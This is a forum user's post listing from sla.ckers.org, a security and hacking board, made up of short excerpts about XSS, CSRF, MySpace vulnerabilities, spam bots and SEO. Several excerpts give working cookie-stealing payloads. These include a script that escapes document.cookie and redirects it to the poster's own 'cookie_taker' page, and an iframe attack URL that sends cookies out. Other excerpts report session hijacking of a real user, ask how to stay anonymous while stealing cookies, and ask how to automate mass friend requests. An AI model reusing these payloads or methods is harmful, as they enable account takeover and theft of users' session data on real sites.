Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 37
7 years ago
digitalIllusionism
It appears Myspace is invincible anymore (aside from some serious low level language trick). Would you agree?
Forum: Full Disclosure
7 years ago
digitalIllusionism
It appears the glitch is fixed but I learned something new. Thank you, Awesomeandrew.
Forum: News and Links
7 years ago
digitalIllusionism
"by simply creating a macro to click the subscribe button" How do I create a macro? Is there a Windows program that can automate it? I wanted to simulate the subscription actions but it replies on cookies.
Forum: News and Links
7 years ago
digitalIllusionism
I'm not sure what to say. I want to say "thanks for the hope" but it sounds funny.
Forum: Full Disclosure
7 years ago
digitalIllusionism
I was having fun with Christ1an's exploits he identified on his blog a while ago. I'm assuming they were included in the 40+ revealed to Google because they're patched. Are there any left that anyone knows about mentioned anywhere on the net? (it's probably hopeless but I thought I'd ask)
Forum: Full Disclosure
7 years ago
digitalIllusionism
This is, no BS, *not* a parody, which makes it all the more funkin' hilarious! http://www.youtube.com/watch?v=DNO6G4ApJQY
Forum: News and Links
7 years ago
digitalIllusionism
lulz, funny post. It entertained me. Nah, I'm not looking to spam or rape a site. I just wanted to send automatic friend requests on a video website to help spread videos. It sounds like a fun challenge. I'd actually talk to the people if once they accepted the request. Thanks for the information.
Forum: SPAM
7 years ago
digitalIllusionism
While this isn't really related to spamming, it's the same question someone interested in learning about spam would ask, so I thought it fit. I want to write a bot that automates actions but I'm not sure where to begin. I know some basic PHP, like how to open web pages, spider/extract strings, and write output based on it. I'm not really advanced but it seems I might not need to be for a bot,
Forum: SPAM
7 years ago
digitalIllusionism
Suppose I use <iframe src="http://REDIRECTurlPREFIX.net?url=http://siteTOhack.org?injVar=attackParameters"> on my server and the attack parameters send a cookie to my server with a regular http://site/com?c=document.cookie Is my server's IP or URL logged? If so, how can I be anonymous? Thanks.
Forum: Privacy
7 years ago
digitalIllusionism
How can I get this to work?
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
@hasse: Isn't this byte 219? Momby's example is functional. I'm not certain where I would specify a length value, but I only overwrote between "<script>" and "</script>", rather than changing the length. In other words: My string is precisely the same size as Momby's, so I'd imagine there's no need to claim a different length. Thanks for replying. kogir said:
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
> Use a hex editor to edit the file and go to byte number 219 (the first byte being > byte 0)." I thought a hex editor was any text editor designed for coding. I've made progress by learning what a hex editor is. Thank you. I haven't been successful at using this exploit, but I'm happy to learn anything, even if I don't get it functional. The 219th byte was the character "t&quo
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
That's the part I don't get. I see no part in the example that resembles the structure of the string "0xdb" in the example. I know "0x" denotes the beginning of a memory address but I don't see how that has anything to do getting this functional. It looks like the octal address encoding on the XSS Cheat Sheet but that's only for IP addresses. My text editor (Notepad++) has only
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
> I don't actually use their shitty services so I can only speculate. Nor do I, but I think we both enjoy playing with their security. > Is their IP address inside of the cookie still, and possibly causing a problem? The IP addresses mismatched for Firefox and it worked, so I don't think that's the reason. Unfortunately, I can't test to be sure. The cookie is now days old (expired) and
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
I managed to get an IE user's cookie with a Momby idea. http://momby.livejournal.com/4922.html Unfortunately, unlike Firefox, I cannot simulate being the user. It just prompts me for the E-Mail and password. There is no MYUSERINFO variable in the cookie. Has anyone tried this bug out or know what the problem is? ty
Forum: CSRF and Session Info
7 years ago
digitalIllusionism
I see. This is so weird. I can't a place as huge as MySpace has such an enormous vulnerability. Good job!
Forum: XSS Info
7 years ago
digitalIllusionism
Hi. Thanks for replying. I think I understand. Supposing Myspace had no protection for the action URL of the form, why would you need to use setTimeout()? I know it sets a delay but why would you need to?
Forum: XSS Info
7 years ago
digitalIllusionism
Royal2000H Wrote: ------------------------------------------------------- > ps, stealing the cookie with what I posted above > won't work because the cookie gets cut off Escape the cookie first or each ampersands in the cookie will just get read as denoting a new variable. c = escape(document.cookie); That has never ceased to work for me. Royal2000H Wrote: ----------------------
Forum: Full Disclosure
7 years ago
digitalIllusionism
Since this inquiry might fuel a long discussion and I don't want to consume the other thread with beginner questions, I created this thread. In trev's domain generalization thread I saw the idea he had for IE/Opera. He said to have the user click a link that uses window.open() to open an authentic window, and have a reference point. I assume he meant using window.open(URL, REFERENCE_NAME_HERE, op
Forum: XSS Info
7 years ago
digitalIllusionism
For anyone who may not be familiar, The Anatomy of a Large-Scale Hypertextual Web Search Engine is the original documentation on Google, by the founders of Google, abundant with information unavailable in Google guidelines. I think the central concepts are all still valid. The original Google was at google.stanford.edu. Edit: IMO, almost anyone is 10,000x better off on Google the legit way. May
Forum: Search Engine Hacking and SEO
7 years ago
digitalIllusionism
lol
Forum: XSS Info
7 years ago
digitalIllusionism
@Trev I'm re-reading this thread and I see what you meant now. :=]
Forum: XSS Info
7 years ago
digitalIllusionism
This isn't XSS and possibly dumb but can make any page on the forum have an unprofessional feel. (page is over 10 screens wide) ThisCanBePreventedWithOverflow-x:hidden;inCSSifYouDontCareAboutValidation.ThisCanBePreventedWithOverflow-x:hidden;inCSSifYouDontCareAboutValidation.ThisCanBePreventedWithOverflow-x:hidden;inCSSifYouDontCareAboutValidation.ThisCanBePreventedWithOverflow-x:hidden;inCSS
Forum: XSS Info
7 years ago
digitalIllusionism
I got it working. Javascript fully works for my target site if it is injected via GET variable. First I wrote what I wanted to run. <script>c=escape(document.cookie);location.href="http://www.mysite.com/cookie_taker?varName="+c</script> Then I had to evade magic slashes so I used the XSS Cheat Sheet and to go <script>document.write(String.fromCharCode(EXAMPLE,
Forum: XSS Info
7 years ago
digitalIllusionism
Oh, no. When I said modify their files, I was referring to the website's files. In other words, I'd like to make it say, "Testing" on one of the regular site pages that everybody sees. I'd like to do something that defies the intended restrictions if cookie theft or gaining full permissions is not possible.
Forum: XSS Info
7 years ago
digitalIllusionism
> You can use an iframe in one site to retrieve the cookies of another site. How can I retrieve cookies from another site if cross-domain access is forbidden? I can run Javascript as if I'm that user, sure, but what power does that give me? What security risk does that pose to them? If Javascript can't modify one of their existing files (maybe it can and I'm not aware), I'm not sure why t
Forum: XSS Info
7 years ago
digitalIllusionism
@Trev This testing has been done on Cutenews software. I can write HTML/Javascript to the page by passing it in through a GET variable. Place I found vulnerability list. In this thread, I asked what good injection could do and you said I could run the URL in a hidden iframe, and execute Javascript with the permissions of that user. If I can do that anyways just by going <iframe src="
Forum: XSS Info
7 years ago
digitalIllusionism
Hello. I'm DigitalIllusionism. I found this website through Google when searching for security information. When I spotted a thread linking the XSS Cheat Sheet on ha.ckers.org, I instantly acquired a new passion. With an interest in development and security, I'll probably be around for a while. I look forward to learning from and interacting with the community. :-]
Forum: Intro
7 years ago
digitalIllusionism
I'd have to see an example to understand the method you mean. Wouldn't it defeat the purpose of finding an injection if you could just access cookies of any embedded iframe? I'm guessing the AJAX has to be part of the iframe URL query string. Edit: It's a somewhat baseless guess though.
Forum: XSS Info
7 years ago
digitalIllusionism
Hi Trev. I'm not sure how you meant that. I tried <iframe src="http://example.com/page.php"> <script> alert(document.cookie); </script> </iframe> and it did not work for me. The only way I know is to write the AJAX as part of the URL's query string, but magic slashes are enabled on the website server and I think I need single quotes.
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2